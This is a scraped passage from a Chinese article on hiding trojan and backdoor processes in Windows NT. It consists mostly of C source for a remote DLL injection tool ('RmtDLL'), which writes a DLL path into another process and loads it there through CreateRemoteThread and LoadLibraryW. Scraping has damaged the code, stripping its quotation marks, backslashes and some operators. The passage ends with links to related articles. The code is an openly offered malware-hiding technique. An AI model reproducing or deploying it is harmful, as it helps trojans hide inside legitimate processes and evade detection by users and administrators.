木马/后门程序在WINNT中进程隐藏及查找的方法
_ACP, MB_ERR_INVALID_CHARS,
lpDllFullPathName, strlen(lpDllFullPathName),
pszLibFileName, MAX_PATH);
CheckError(iReturnCode, 0, MultByteToWideChar);
//输出最后的操作参数
wprintf(LWill inject %s, pszLibFileName);
printf( into process:%s PID=%dn, argv[1], dwRemoteProcessId);
}
//打开远程进程
hRemoteProcess = OpenProcess(PROCESS_CREATE_THREAD | //允许创建线程
PROCESS_VM_OPERATION | //允许VM操作
PROCESS_VM_WRITE, //允许VM写
FALSE, dwRemoteProcessId );
CheckError( (int) hRemoteProcess, NULL,
Remote Process not Exist or Access Denied!);
//计算DLL路径名需要的内存空间
int cb = (1 + lstrlenW(pszLibFileName)) * sizeof(WCHAR);
pszLibFileRemote = (PWSTR) VirtualAllocEx( hRemoteProcess, NULL, cb,
MEM_COMMIT, PAGE_READWRITE);
CheckError((int)pszLibFileRemote, NULL, VirtualAllocEx);
//将DLL的路径名复制到远程进程的内存空间
iReturnCode = WriteProcessMemory(hRemoteProcess,
pszLibFileRemote, (PVOID) pszLibFileName, cb, NULL);
CheckError(iReturnCode, false, WriteProcessMemory);
//计算LoadLibraryW的入口地址
PTHREAD_START_ROUTINE pfnStartAddr = (PTHREAD_START_ROUTINE)
GetProcAddress(GetModuleHandle(TEXT(Kernel32)), LoadLibraryW);
CheckError((int)pfnStartAddr, NULL, GetProcAddress);
//启动远程线程,通过远程线程调用用户的DLL文件
hRemoteThread = CreateRemoteThread( hRemoteProcess, NULL, 0, pfnStartAddr, pszLibFileRemote, 0, NULL);
CheckError((int)hRemoteThread, NULL, Create Remote Thread);
//等待远程线程退出
WaitForSingleObject(hRemoteThread, INFINITE);
//清场处理
if (pszLibFileRemote != NULL)
VirtualFreeEx(hRemoteProcess, pszLibFileRemote, 0, MEM_RELEASE);
if (hRemoteThread != NULL) CloseHandle(hRemoteThread );
if (hRemoteProcess!= NULL) CloseHandle(hRemoteProcess);
}//end of main()
//将进程名转换为PID的函数
DWORD ProcessToPID(char *InputProcessName)
{
DWORD aProcesses[1024], cbNeeded, cProcesses;
unsigned int i;
HANDLE hProcess;
HMODULE hMod;
char szProcessName[MAX_PATH] = UnknownProcess;
// 计算目前有多少进程, aProcesses[]用来存放有效的进程PIDs
if ( !EnumProcesses( aProcesses, sizeof(aProcesses), cbNeeded ) ) return 0;
cProcesses = cbNeeded / sizeof(DWORD);
// 按有效的PID遍历所有的进程
for ( i = 0; i cProcesses; i++ )
{
// 打开特定PID的进程
hProcess = OpenProcess( PROCESS_QUERY_INFORMATION |
PROCESS_VM_READ,
FALSE, aProcesses[i]);
// 取得特定PID的进程名
if ( hProcess )
{
if ( EnumProcessModules( hProcess, hMod, sizeof(hMod), cbNeeded) )
{
GetModuleBaseName( hProcess, hMod,
szProcessName, sizeof(szProcessName) );
//将取得的进程名与输入的进程名比较,如相同则返回进程PID
if(!_stricmp(szProcessName, InputProcessName)){
CloseHandle( hProcess );
return aProcesses[i];
}
}
}//end of if ( hProcess )
}//end of for
//没有找到相应的进程名,返回0
CloseHandle( hProcess );
return 0;
}//end of ProcessToPID
//错误处理函数CheckError()
//如果iReturnCode等于iErrorCode,则输出pErrorMsg并退出
void CheckError(int iReturnCode, int iErrorCode, char *pErrorMsg)
{
if(iReturnCode==iErrorCode) {
printf(%s Error:%dnn, pErrorMsg, GetLastError());
//清场处理
if (pszLibFileRemote != NULL)
VirtualFreeEx(hRemoteProcess, pszLibFileRemote, 0, MEM_RELEASE);
if (hRemoteThread != NULL) CloseHandle(hRemoteThread );
if (hRemoteProcess!= NULL) CloseHandle(hRemoteProcess);
exit(0);
}
}//end of CheckError()
//使用方法说明函数usage()
void usage(char * pErrorMsg)
{
printf(%snn,pErrorMsg);
printf(ttRemote Process DLL by Shotgunn);
printf(tThis program can inject a DLL into remote processn);
printf(Email:n);
printf(tShotgun@Xici.Netn);
printf(HomePage:n);
printf(thttp://It.Xici.Netn);
printf(thttp://www.Patching.Netn);
printf(USAGE:n);
printf(tRmtDLL.exe PID[|ProcessName] DLLFullPathNamen);
printf(Example:n);
printf(tRmtDLL.exe 1024 C:WINNTSystem32MyDLL.dlln);
printf(tRmtDLL.exe Explorer.exe C:MyDLL.dlln);
隐藏 查找 方法 进程 WINNT 后门 程序 木马 相关文章:
- 基于硬件隐藏思想设计MCF5307嵌入式系统驱动程序(05-15)
- 空间域图像信息隐藏技术简介(11-26)
- P89C51RD2隐藏分区的读取方法(08-15)
- 门限图像隐藏技术的实施与改进(07-12)
- 二进制数折半查找算法在DSP上的实现(11-30)
- 用插值查找表实现FPGA的DSP功能(02-10)